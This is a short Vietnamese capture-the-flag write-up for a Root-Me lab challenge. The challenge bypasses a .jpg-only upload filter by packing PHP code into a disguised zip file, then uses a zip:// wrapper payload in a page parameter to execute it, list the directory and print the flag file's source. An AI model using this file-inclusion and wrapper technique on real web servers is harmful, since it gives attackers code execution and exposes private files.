Local File Inclusion - Wrappers¶

Estimated time to read: 3 minutes

May 09, 2023

Tài nguyên và link challenge¶

Tài nguyên của challenge này tại https://www.root-me.org/en/Challenges/Web-Server/Local-File-Inclusion-Wrappers

Link challenge này tại http://challenge01.root-me.org/web-serveur/ch45/

Tổng quan¶

Trong challenge này, mục tiêu của ta là lấy được flag.

Kịch bản tấn công¶

Bước 1: Kiểm tra website¶

Challenge này cung cấp cho chúng ta một website có chức năng upload ảnh.

Hơn nữa, Website còn filter việc chỉ cho phép chúng ta upload lên mỗi file dạng .jpg

Bản chất file ảnh cũng chỉ là 1 file nén được nén thành định dạng ảnh (png, jpg,...). Ta có thể lợi dụng việc này để tạo một file thực thi code php nhưng nén lại với file có định dạng ảnh, và upload lên server để thăm dò những việc tiếp theo.

Bước 2: Tạo code attack¶

Ta thử tạo một đoạn code php để lấy ra các file có trong thư mục như sau

1

<pre><?php $scan = scandir('.'); foreach($scan as $file){echo $file;} ?></pre>;

Sau đó upload lên website (file tên aa.jpg)

Ta sẽ dùng ?page=zip://tmp/upload/<tên file .jpq>%23aa dể chạy file php. Ở đây, tên file sau khi được upload đã được modified và mang tên AQy0SFiS4.jpg

Roài, ta tìm được file flag....php

Tiến hành đọc file thôi nào!!!

Tương tự như trên, code php đọc file flag là

1

<pre><?php show_source('flag-mipkBswUppqwXlq9ZydO.php'); ?></pre>;

Comments